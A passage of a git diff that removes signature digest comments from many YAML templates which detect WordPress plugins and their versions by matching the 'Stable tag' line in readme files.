b/http/technologies/wordpress/plugins/extendify.yaml index b72d7fb490..554a7ddc52 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d391ebc193aa099602b5a174d8394f05c849a039fb4790fe431797b909e53c4a02201b3c70a0b0a671245872a43434c20506471dfc42f977999f7f4d6fea2c763442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index dc1eee4570..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100845d54253cca35c13173091d65f9cd4ed511c7c8d4b0414a2d6febd7b709179a022035b85170c535eef86cb60a08e836e9c0866628ec96404b3f50d135014c6a147b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 4a720f7e59..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022065752bf1629e498c6ad553fdaebba4a2291656b2bc931ecb8c2f49efad470460022100cb3adf99d65fb12b218b25b5dfc66fdfa54e64008c4352d9c220790729327028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index cb09cff92c..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022028b262091fed8ad2b6a5da8c1460b00b80ab462851424bf023d77a79c393c7ef022100bce6462031e5429aae5721a6266eedb5fbe29a846b79e263a73b923547461286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 97f7f532b5..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100da2696b69107dccac06bfc42e0fe06a734d787e802d739f2bf6c564fd5f2c9ae022100deb83c973825671129f2e063bd4efc706311aee7fedfb14a64b1a619b7f7456e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 661fc60586..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100abb8576701ef8f155982c2e84136915f490884ee89656d39680a0dc7b8928950022100fcf2371919bb2b8d8a6fb4ffa0ed71db3e265f6d1194118871b452dab05e6855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 5d21e42aa2..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022015d3c1bec64f87266f4c88e8c6956b09a17a70125eaf130dd040fd9a909cfd7a022051929a126f7914bde00aaec0b815df1c18be1a5eed2dc3647d234e3ea168ac7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 752a1e94cc..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009f290b451dcef9f48c2db11cc9cc88ff5a408bf27a6cfbc198bc99726b48d548022100db45bb9f6747a97e0e68af0ed598d0566994abecd17ea51f9ddba95bd048266e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 7f426ce5cb..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206a4fd0e69b63334460aa1d60b80be28db31e7a5f7422fd46da7d6cdd788a5c51022059673d04b2e9e48a666a1cb3a27219d4abb5287cc8faaa33d1eb4840a5cdfa66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 2c076bb4bd..ce5dc03713 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f7b84d551b19e83d8464ffaea3119d32671d7d07e84cc429f910f61ea9a8a25302205946b13a3379687be07dc57cbfa280f3597ebc9577bcf8ad2b539fcdb65a48ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 5df019fd42..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b8486e451bccf1f2837999f1936a7f4bfbfb9925484869ea212a2dd0f5a9c739022100f88c6257af050b2403bc8c1afd89c440045db47d51ac4c456a6ac7759dd3e1a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index a7088fbced..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008b0bbcfeb8887c35069bfbf60f0c0c7ffc5bb7d29fb826826bb4f2623ee6e0f9022100f1202ab5c59139130878e86d9fc7d4986f1c57a3a93a492e61a410423fe3b815:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index f5d474d940..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022025a5569b4b8160891492a66ed7bed5929d484cc9d36300041ffaa2e570e1b2130221008124151b4493f378e088c4929d2e2e3c51d53bd361053e9933933e339510b8ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ea4d90eab0..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022061d29fc5297612a3bfadc9b5d9234ac1937b44290c30acd0e58c68bb10004c21022100c3feefb059548d7e67bedb6d9616d1273ad8dd258ad4fbc9e4f94e01b6becda8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index c92d68406b..45260ccfba 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210089d4c0be3525e4748a4d0e6662b8fa1ada6dbc32bdb7dc245719c500151a9efe022100a55f5b734e9bf476dbc405c800c651385e50a3167f3a10774bdf1268e0349af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index c0db2ddd18..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bef7b3bb8521d8475b7edc933c43a541e870a1845f134abfcbe8d819db7e626c0221009ac53d0183c2068b29050e8e21758903acaa36aefe19adae7dcfe700a58e33fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index aac2a4278c..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206a805e9426683affecd9f4afffd7d237a986d4adb424c9ec86ef2d0e71153c38022100a0d3cbda60f600ecb4b9853a29dd68005174b30b52b02f4e8aadf77aa47f9801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 05be16f1c7..64cfced6cf 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022072e02e8082537bfddd35fcd42ce2454ef727e48246e268cda824e99ef0bbe49e022100f4b3d8eaec74f3ce6d6f547353df193308bc4cf612ea3e9ddfcb302b9507b19f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index da52cf9faa..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f2b10a813a06c7be9f018643ff28a0f0db0f45b35d3bf5b8f2502d25890c4e0c022100ef0bf221d203a03b2dfd16e7fb3734444f783f1526a365a5c1553013324907b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index cacf27caee..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201f50f1965b442751fce1b64440089c6ebfc80915ac80af1faaf9c457aa810eb70220062f957152ad0bc19eecb9ac27688bfe23cb68d936af6a8fc6c0bde665d3b47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index ec4d453fb8..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c9c925e279b8b47297d2fcd12c1c24574045294f974320f649411798fe538973022100f4ce5c153cb9455e57a0ace69b3e5984599dc16c8445c03946baf50381ece1c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 70b968c507..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220255c6bb180adbf1d612e85490df68bf373a11d238f246477881cf13965c29321022100ae802516ac4380a2aeed3aa9af2a3251303fc6a2af5fcad0ba72baeeb42b08b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 9e49b568d4..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022024663d7448b62c9e93c1a54ac6934e397a385acda479e9b236857838d668a24d022100950a7345aa0f9f10ef74aa912c825adf0c16dc75f396f093e0666484c2d0bf9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 974a267eab..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009bdd646a8adb268f77e029f97a855ba84bdd3a4d66152a16498f8de665783e0c022043e5de0a6318ee886589122d6d25f8b68e70181e45bf32a3443f606bb8f3b102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index c8da759896..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202975a8b5ace21536f462540330f8c1a8715f0519df0db743dc0e6fc23ab39ffa022100878be5ad82b96e3477fa0c06b87b70ee2c69571fe963cb853da16b2732ceee80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 3df72ff497..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100867dcbcef44d564d1dd391e8fc4352f0c1cfa949064600a090026942c1631098022100f9ab8cada5240efaa018bdea9909fe12d37496ac3aa3ecf325c628abcfe8e0e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 04ede529da..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202de6fce21dfd35994e9ca13b796bc5bdd05dfa57d937be73d5e5a25c55d9d5450220605d38fa9e3602796d49415519e9ce4918dbdde7d929c069c50eb687b41a311a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 45bd55e276..4a68323ae1 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a7cc23f130aa93cfee3131d3ac2f11956ec1e8ed86f050f912979616d056607a022100aab0904480f2a52070912492252fd8b23e447a26993b43aa26bb35be81599a4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 058fa7b1fc..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022068256fb3bacbc87c85af3f19e671ac7af613785bab457b11cb45a2aa9d5cdf38022032d7d0eb187f83418db310e19f917217042bc298b861ee2e9b669d4088cd246a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c7cf77a21a..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220618f7405301d152b2f2bda10d463a6b6d13a79dde79e547421113ff75ab22ab202202b6b65a8f35cfce3b35c5a871b786e7862a0084f00cfd45d05d70dc3ee10978b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index a06e6fc361..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b440b0d9b153a93e5f34e7a9fcf9e3795e07be9afdf00851c9a8c3796765433e022100963c872d3e9920735447f9ab13d3afede07b199825389a4427569d6de3206f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index a3f51504f3..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f867e5f415c1c5548aee0ef26ee110f3e23470d1303ff4c2780837f7663da45c022100cad48fdc8896ac3b5af13b8893a704d93b9d3d5b60276bd05d68f2dec9201720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index de4b00fe54..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220358e1b716f2b8533732ad362b32ece38053c880b8715428008c8283f1443f2660221009594c2b206be4e71a9e84dd46bfe0d9bcb6b20b65a3118ba27f41ac02a51f4a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 96af508fdc..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206f964b24ee3813b498ec3b707ac1d33f71be336f4906711a31ff21a9de1fa23b0220094339dcdd315ef65215cab9fd3cbc200dbf8bcb1a6beb76dff20c596a6cd849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index a256a95c9a..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100df4ef30de7a2fc8112cc79db020745ef0e4ce572f1994281c1f6a0c5256b61ce022100a2bc028f3e1db32d4ea4451d02eee6b1ea21a5e39cf5d8790417ddf68861bd65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index a3984b7daa..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206a0af2eea78df90f32adeeea23bda24ec9f25695bad02ebb42b57b5f8eea2cb502210092bf9f016ede48dfa85faf59a83e00d5b9a14afda2c096b7bc43bb2c55482f26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index a5c49384ee..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207551b7aeb0032ab6691d0b7cb5ede4e4f9046e2536cb76cb358added74929e7902200cbea5193619557480cff049117643971cf9e54da5e466f34489cce541d12360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index a7068af84a..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ec162d16dc863590cdb9b16067ca3551a1d8d2d345f8f99f6554a547140dd36d022037e01b42dc54d40db76090f30aef890977181fe86d79f7ffc70e114af90bc99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 528c05d599..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220160dd99eea758d8be562da9c9c1639f4617b4ecf5ed6df138e66f05bbb5ec515022024bf53e92dfc9e27e4422cc002b067782c0ee433085baeff9e6c498e6397aa2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index dd5387ff95..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210084897066974d2818798cf31421ddfcdb6fd74e1b5015ac6b5c693d3921bd8f9c022100e7de4c4ab19aa48f622e1093f36d31d56fef9733d2ff3df3b963cd7d3e2e08d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 2a14753c4d..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ae7036ea053485fd9a222d232b4f08dbe57a8e37e96048ead947ca4fb4a55b9f022046630938406716cb0247d936ff673e2f8fd9b57c8be19374e940cd894fa6f723:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index bfe16bfcdc..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b140dcec43f6724c195261b73f593e294f27419961ee9544ff03bf0ca90c4ab102201061f86dab8446f6445aff0346649432339509c4f4ca49da42ede93f45bf14d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 81b3032821..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201937acee156fab4b55c5257ded0d0a852392cfc2d474c5551e7d35f7814924040220068091fd987b776625afc7b374463ee01934eaf4cdecddf30f43d5b42e336f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 13e5dad56f..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207fc1783abb9892284ffc96bcfd504927c5bfe94574ced5ea612f3a442ca1fe98022100ff3a03dcaaf106040c348961cf5e016787a95c927a0101498f61326a29dbfed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index a3dd0df51a..ed3161d27c 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008417a418231424d284554b54bcd3856c81a43473c8bb19da3a3fcbddc95b46ba02205c3f649e06265f38ee436cfb6389bc83907301555dc32b2d56d4c14725fb25bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 9d3a2b48eb..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e6020eafc2029d010212e7aeca0a7b797ab36cf8702d06b655eab7592fed98c80221009943a76d64e4a82ac4a645d40e5a65554de203b7afe71b000158f1cabbee30ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index bb2c79f5cf..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210094e35ac2bde8b6648fb477d51f50efcb5008e128e64c675edeee418b8b95b1b002200683b79d5181a0eb4cf3aacdad140cc8f909a11c668ee68d87b865a4f939a1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 20e1984830..969c280ee1 100644 --- 